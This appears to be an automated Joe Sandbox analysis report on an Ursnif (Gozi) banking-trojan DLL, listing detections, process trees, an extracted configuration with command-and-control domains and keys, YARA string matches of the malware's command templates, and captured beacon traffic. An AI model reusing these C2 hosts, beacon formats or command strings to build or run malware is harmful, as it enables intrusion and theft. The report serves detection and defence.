Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cVZ5IwmAMe.dll

Overview

General Information

Sample Name:cVZ5IwmAMe.dll
Analysis ID:726756
MD5:17ddc738604a040176b85c80173c5090
SHA1:75db1976ccc16912d4f1d4fc68b8c8975ad39ac4
SHA256:4c0ccba038ff513555223a880da3760a974b0479fe6cf0e823f08774ecd0d9ba
Tags:dllgoziisfbpw758493ursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Found stalling execution ending in API Sleep call
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 2820 cmdline: loaddll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 3988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4832 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1388 cmdline: rundll32.exe "C:\Users\user\Desktop\cVZ5IwmAMe.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 1356 cmdline: regsvr32.exe /s C:\Users\user\Desktop\cVZ5IwmAMe.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 5824 cmdline: rundll32.exe C:\Users\user\Desktop\cVZ5IwmAMe.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 1304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 276 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
    00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0xff0:$a1: /C ping localhost -n %u && del "%s"
      • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xca8:$a5: filename="%.4u.%lu"
      • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe72:$a9: &whoami=%s
      • 0xe5a:$a10: %u.%u_%u_%u_x%u
      • 0xc22:$a11: size=%u&hash=0x%08x
      • 0xc13:$a12: &uptime=%u
      • 0xda7:$a13: %systemroot%\system32\c_1252.nls
      • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 96 entries
      SourceRuleDescriptionAuthorStrings
      0.0.loaddll32.exe.10000000.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        0.0.loaddll32.exe.1137891.12.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          0.0.loaddll32.exe.1137891.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            0.0.loaddll32.exe.1137891.9.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.2.regsvr32.exe.3173b01.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                Click to see the 33 entries
                No Sigma rule has matched
                Timestamp:192.168.2.362.173.145.18349779802033204 10/20/22-14:22:35.988557
                SID:2033204
                Source Port:49779
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.38.8.8.853844532023883 10/20/22-14:22:35.055566
                SID:2023883
                Source Port:53844
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.38.8.8.856042532023883 10/20/22-14:20:53.394754
                SID:2023883
                Source Port:56042
                Destination Port:53
                Protocol:UDP
                Classtype:Potentially Bad Traffic
                Timestamp:192.168.2.313.107.42.1649746802033203 10/20/22-14:20:38.516902
                SID:2033203
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.313.107.42.1649783802033203 10/20/22-14:23:00.375733
                SID:2033203
                Source Port:49783
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.362.173.145.18349781802033204 10/20/22-14:22:43.698697
                SID:2033204
                Source Port:49781
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.362.173.145.18349781802033203 10/20/22-14:22:43.698697
                SID:2033203
                Source Port:49781
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.313.107.42.1649737802033204 10/20/22-14:20:33.133617
                SID:2033204
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.313.107.42.1649782802033203 10/20/22-14:22:56.111849
                SID:2033203
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.313.107.42.1649737802033203 10/20/22-14:20:33.133617
                SID:2033203
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.313.107.43.1649784802033203 10/20/22-14:23:03.824569
                SID:2033203
                Source Port:49784
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.313.107.43.1649754802033203 10/20/22-14:20:41.475087
                SID:2033203
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.313.107.43.1649754802033204 10/20/22-14:20:41.475087
                SID:2033204
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.362.173.145.18349780802033204 10/20/22-14:22:40.268484
                SID:2033204
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.362.173.145.18349780802033203 10/20/22-14:22:40.268484
                SID:2033203
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: cVZ5IwmAMe.dllReversingLabs: Detection: 45%
                Source: cVZ5IwmAMe.dllVirustotal: Detection: 47%Perma Link
                Source: linetwork.topVirustotal: Detection: 11%Perma Link
                Source: onlinetwork.topVirustotal: Detection: 12%Perma Link
                Source: http://onlinetwork.top/Virustotal: Detection: 12%Perma Link
                Source: 0.2.loaddll32.exe.10000000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 0.0.loaddll32.exe.10000000.10.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 5.2.rundll32.exe.10000000.4.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 3.2.regsvr32.exe.10000000.4.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 0.0.loaddll32.exe.10000000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 4.2.rundll32.exe.10000000.4.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 0.0.loaddll32.exe.10000000.14.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 0.0.loaddll32.exe.10000000.6.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 3.2.regsvr32.exe.317d710.1.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054047E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                Source: cVZ5IwmAMe.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                Source: cVZ5IwmAMe.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT

                Networking

                barindex
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.173.145.183 80
                Source: C:\Windows\SysWOW64\rundll32.exeDomain query: onlinetwork.top
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.44.194 80
                Source: C:\Windows\SysWOW64\rundll32.exeDomain query: linetwork.top
                Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49737 -> 13.107.42.16:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49737 -> 13.107.42.16:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 13.107.42.16:80
                Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 13.107.43.16:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 13.107.43.16:80
                Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:56042 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:53844 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49779 -> 62.173.145.183:80
                Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49780 -> 62.173.145.183:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49780 -> 62.173.145.183:80
                Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49781 -> 62.173.145.183:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49781 -> 62.173.145.183:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49782 -> 13.107.42.16:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49783 -> 13.107.42.16:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49784 -> 13.107.43.16:80
                Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
                Source: Joe Sandbox ViewASN Name: ASRELINKRU ASRELINKRU
                Source: global trafficHTTP traffic detected: GET /drew/09dgKs_2BbGAUCZtNDfinAe/OBR2Fkwyls/rLfOzEm8taaEOpdgP/DGmX0HEH0YWb/9UgQCY1OoBP/16pWsh4Cy9rMRa/0naMTlH4D0jWSBvaLUMCT/VzfvlLpo6FHUtlJQ/DtpBc7vmn8rOS4k/xe3M0wkxCK5Om9Qsrc/Fu1mpdzkb/E5_2FW9vtCbCxhM8q_2F/YFJvu0mL313E60i9bem/o9T05qm4K45Pkaydjzo9gZ/BS0FXjQKsPhWn/z4GNxY84/_2FhBQGZQz4I6Dv77YbEnq5/_2FeodcjVbE87q/b67.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /drew/0sQ7G5MK/K3A5th94SczU1K59UFfpeLh/J17DiVhkKW/LyhNewAspCDHUtEas/F0gRR_2BrzDs/iuv6_2F2R2q/VU2O6EJ3EhI5uh/A5C2wRpZF_2FN6Skwj1uH/gsVRqmZs2mqIGO1d/sKRhOCfSSp3MAva/Mxxm2nqzKORinrbeZ3/z67oAItgn/k8VHFWexyUU_2FA_2BPV/QdcdTsvdt_2BKefM9G5/mT6M3zVj_2BfxHgfvoM1Vv/marhfTTPZdwKD/8RgEG4oq/f5httb_2BKiNQuEoUj_2FU4/qo0ljR4FNC0/5q1FSK.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /drew/KMMjqoTxziRlJvE/gNQPrvUPxqLNufKLCE/JH3UmHEB_/2B_2BzV_2BvfObx2f9w0/DgM6KzpzkFa0_2B2dRV/pBB0_2FnhSh3B1HrWQggbl/6yr_2BeHM7RhP/EQBdRd5n/WMFWEYQbNncplyS1nZxHquO/Dl0_2FZlCi/H7jS5UTDOVVAj0e_2/BP38A8joa9MI/uVE_2Fo3ECW/1FFJSef9MuZGr_/2B9LknlvHMlh3p6lHoAOu/HpoF5RbVarHLswoW/XhjcRNsVFN_2Faq/1QC22OwanscYLqlevC/p97ADQM6AS8_2FJi/nn82n.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                Source: regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/
                Source: regsvr32.exe, 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/jciGtuLhPA3ii/LS7TCFol/HqPA1Itk15gDfktzBx5pYkp/fui_2BHoOR/xdYi96py
                Source: regsvr32.exe, 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/sFgPerwD_2B/bg.
                Source: regsvr32.exe, 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/sFgPerwD_2B/bg..
                Source: regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/sFgPerwD_2B/bgU8JpQRNlgOji/9so7y8BqDOEH_2Brf7ODu/EabfDivPskLgm
                Source: regsvr32.exe, 00000003.00000003.371085476.00000000031B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/sFgPerwD_2B/bgU8JpQRNlgOji/9so7y8BqDOEH_2Brf7ODu/EabfDivPskLgmx0S/
                Source: regsvr32.exe, 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://linetwork.top/
                Source: regsvr32.exe, 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://linetwork.top/drew/0sQ7G5MK/K3A5th94SczU1K59UFfpeLh/J17DiVhkKW/LyhNewAspCDHUtEas/F0gRR_2BrzDs
                Source: regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/
                Source: regsvr32.exe, 00000003.00000002.765358952.00000000031C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/drew/5f_2BEDtM2CrlBj8hi85/PfpslRV80x6hEReBBsC/BgCJ3i1tejkKUVj0skPC_2/FG_2BjUb
                Source: regsvr32.exe, 00000003.00000003.371085476.00000000031B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/drew/K_2FqA2xbKL/njlOSx6YZxCsC1/NFhl_2FKNwee1I_2FsyQo/3lkzkmpLRl6mAh0d/8NioTP
                Source: unknownDNS traffic detected: queries for: onlinetwork.top
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05404F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                Source: global trafficHTTP traffic detected: GET /drew/09dgKs_2BbGAUCZtNDfinAe/OBR2Fkwyls/rLfOzEm8taaEOpdgP/DGmX0HEH0YWb/9UgQCY1OoBP/16pWsh4Cy9rMRa/0naMTlH4D0jWSBvaLUMCT/VzfvlLpo6FHUtlJQ/DtpBc7vmn8rOS4k/xe3M0wkxCK5Om9Qsrc/Fu1mpdzkb/E5_2FW9vtCbCxhM8q_2F/YFJvu0mL313E60i9bem/o9T05qm4K45Pkaydjzo9gZ/BS0FXjQKsPhWn/z4GNxY84/_2FhBQGZQz4I6Dv77YbEnq5/_2FeodcjVbE87q/b67.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /drew/0sQ7G5MK/K3A5th94SczU1K59UFfpeLh/J17DiVhkKW/LyhNewAspCDHUtEas/F0gRR_2BrzDs/iuv6_2F2R2q/VU2O6EJ3EhI5uh/A5C2wRpZF_2FN6Skwj1uH/gsVRqmZs2mqIGO1d/sKRhOCfSSp3MAva/Mxxm2nqzKORinrbeZ3/z67oAItgn/k8VHFWexyUU_2FA_2BPV/QdcdTsvdt_2BKefM9G5/mT6M3zVj_2BfxHgfvoM1Vv/marhfTTPZdwKD/8RgEG4oq/f5httb_2BKiNQuEoUj_2FU4/qo0ljR4FNC0/5q1FSK.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /drew/KMMjqoTxziRlJvE/gNQPrvUPxqLNufKLCE/JH3UmHEB_/2B_2BzV_2BvfObx2f9w0/DgM6KzpzkFa0_2B2dRV/pBB0_2FnhSh3B1HrWQggbl/6yr_2BeHM7RhP/EQBdRd5n/WMFWEYQbNncplyS1nZxHquO/Dl0_2FZlCi/H7jS5UTDOVVAj0e_2/BP38A8joa9MI/uVE_2Fo3ECW/1FFJSef9MuZGr_/2B9LknlvHMlh3p6lHoAOu/HpoF5RbVarHLswoW/XhjcRNsVFN_2Faq/1QC22OwanscYLqlevC/p97ADQM6AS8_2FJi/nn82n.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.46b94a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.5400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
